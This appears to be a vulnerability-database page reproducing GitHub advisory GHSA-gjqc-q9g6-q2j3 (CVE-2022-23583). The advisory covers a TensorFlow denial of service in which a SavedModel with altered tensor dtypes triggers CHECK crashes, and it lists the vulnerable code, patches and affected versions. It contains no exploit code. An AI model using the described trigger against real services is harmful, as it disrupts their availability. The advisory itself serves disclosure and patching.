      "type": "WEB",
      "url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsma-26-181-01.json"
    },
    {
      "type": "WEB",
      "url": "https://www.cisa.gov/news-events/ics-medical-advisories/icsma-26-181-01"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-GJQC-Q9G6-Q2J3

Vulnerability from github – Published: 2022-02-10 00:34 – Updated: 2024-11-07 22:28
VLAI
Summary
`CHECK`-failures in binary ops in Tensorflow
Details

Impact

A malicious user can cause a denial of service by altering a SavedModel such that any binary op would trigger CHECK failures. This occurs when the protobuf part corresponding to the tensor arguments is modified such that the dtype no longer matches the dtype expected by the op. In that case, calling the templated binary operator for the binary op would receive corrupted data, due to the type confusion involved:

functor::BinaryFunctor<Device, Functor, 1>()(
    eigen_device, out->template flat<Tout>(),
    input_0.template flat<Tin>(), input_1.template flat<Tin>(),
    error_ptr);

If Tin and Tout don't match the type of data in out and input_* tensors then flat<*> would interpret it wrongly. In most cases, this would be a silent failure, but we have noticed scenarios where this results in a CHECK crash, hence a denial of service.

Patches

We have patched the issue in GitHub commit a7c02f1a9bbc35473969618a09ee5f9f5d3e52d9. The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supported range.

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "tensorflow"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.5.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "tensorflow"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.6.0"
            },
            {
              "fixed": "2.6.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "tensorflow"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.7.0"
            },
            {
              "fixed": "2.7.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ],
      "versions": [
        "2.7.0"
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "tensorflow-cpu"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.5.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "tensorflow-cpu"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.6.0"
            },
            {
              "fixed": "2.6.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "tensorflow-cpu"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.7.0"
            },
            {
              "fixed": "2.7.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ],
      "versions": [
        "2.7.0"
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "tensorflow-gpu"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.5.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "tensorflow-gpu"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.6.0"
            },
            {
              "fixed": "2.6.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "tensorflow-gpu"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.7.0"
            },
            {
              "fixed": "2.7.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ],
      "versions": [
        "2.7.0"
      ]
    }
  ],
  "aliases": [
    "CVE-2022-23583"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-617",
      "CWE-843"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2022-02-04T19:45:57Z",
    "nvd_published_at": "2022-02-04T23:15:00Z",
    "severity": "MODERATE"
  },
  "details": "### Impact\nA malicious user can cause a denial of service by altering a `SavedModel` such that [any binary op](https://github.com/tensorflow/tensorflow/blob/a1320ec1eac186da1d03f033109191f715b2b130/tensorflow/core/kernels/cwise_ops_common.h#L88-L137) would trigger `CHECK` failures. This occurs when the protobuf part corresponding to the tensor arguments is modified such that the `dtype` no longer matches the `dtype` expected by the op. In that case, calling the templated binary operator for the binary op would receive corrupted data, due to the type confusion involved:\n\n```cc\nfunctor::BinaryFunctor\u003cDevice, Functor, 1\u003e()(\n    eigen_device, out-\u003etemplate flat\u003cTout\u003e(),\n    input_0.template flat\u003cTin\u003e(), input_1.template flat\u003cTin\u003e(),\n    error_ptr);\n```\nIf `Tin` and `Tout` don\u0027t match the type of data in `out` and `input_*` tensors then `flat\u003c*\u003e` would interpret it wrongly. In most cases, this would be a silent failure, but we have noticed scenarios where this results in a `CHECK` crash, hence a denial of service.\n\n### Patches\nWe have patched the issue in GitHub commit [a7c02f1a9bbc35473969618a09ee5f9f5d3e52d9](https://github.com/tensorflow/tensorflow/commit/a7c02f1a9bbc35473969618a09ee5f9f5d3e52d9).\nThe fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supported range.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.",
  "id": "GHSA-gjqc-q9g6-q2j3",
  "modified": "2024-11-07T22:28:14Z",
  "published": "2022-02-10T00:34:13Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-gjqc-q9g6-q2j3"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-23583"
    },
    {
      "type": "WEB",
      "url": "https://github.com/tensorflow/tensorflow/commit/a7c02f1a9bbc35473969618a09ee5f9f5d3e52d9"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2022-92.yaml"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2022-147.yaml"
    },
    {
      "type": "WEB",
      "url": "https://github.com/tensorflow/tensorflow"
    },
    {
      "type": "WEB",
      "url": "https://github.com/tensorflow/tensorflow/blob/a1320ec1eac186da1d03f033109191f715b2b130/tensorflow/core/kernels/cwise_ops_common.h#L88-L137"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "`CHECK`-failures in binary ops in Tensorflow"
}

No mitigation information available for this CWE.

No CAPEC attack patterns related to this CWE.